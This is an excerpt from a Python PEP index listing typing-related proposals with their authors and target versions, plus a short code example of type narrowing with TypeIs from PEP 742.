SF695 | Type Parameter Syntax | Eric Traut | 3.12
SF696 | Type Defaults for Type Parameters | James Hilton-Balfe | 3.13
SF698 | Override Decorator for Static Typing | Steven Troxler, Joshua Xu, Shannon Zhu | 3.12
SF702 | Marking deprecations using the type system | Jelle Zijlstra | 3.13
SF705 | TypedDict: Read-only items | Alice Purcell | 3.13
SF742 | Narrowing types with TypeIs | Jelle Zijlstra | 3.13
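Two related entries above, PEP 647 (TypeGuard) and PEP 742 (TypeIs), both let a user-defined predicate narrow types for a static checker. A small sketch of the PEP 742 form follows; typing.TypeIs needs Python 3.13+ (older versions can import it from typing_extensions):

```python
from typing import TypeIs

def is_str_list(val: list[object]) -> TypeIs[list[str]]:
    # PEP 742: a True result tells the checker val is list[str]
    return all(isinstance(x, str) for x in val)

def join(val: list[object]) -> str:
    if is_str_list(val):
        return ", ".join(val)  # val narrowed to list[str] here
    return ""

print(join(["a", "b"]))  # a, b
print(join([1, 2]))      # (empty string)
```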

Rejected, Superseded, and Withdrawn PEPs

PEP | Title | Authors | Python Version
SR677 | Callable Type Syntax | Steven Troxler, Pradeep Kumar Srinivasan | 3.11
SW724 | Stricter Type Guards | Rich Chiodo, Eric Traut, Erik De Bonte | 3.13

\ No newline at end of file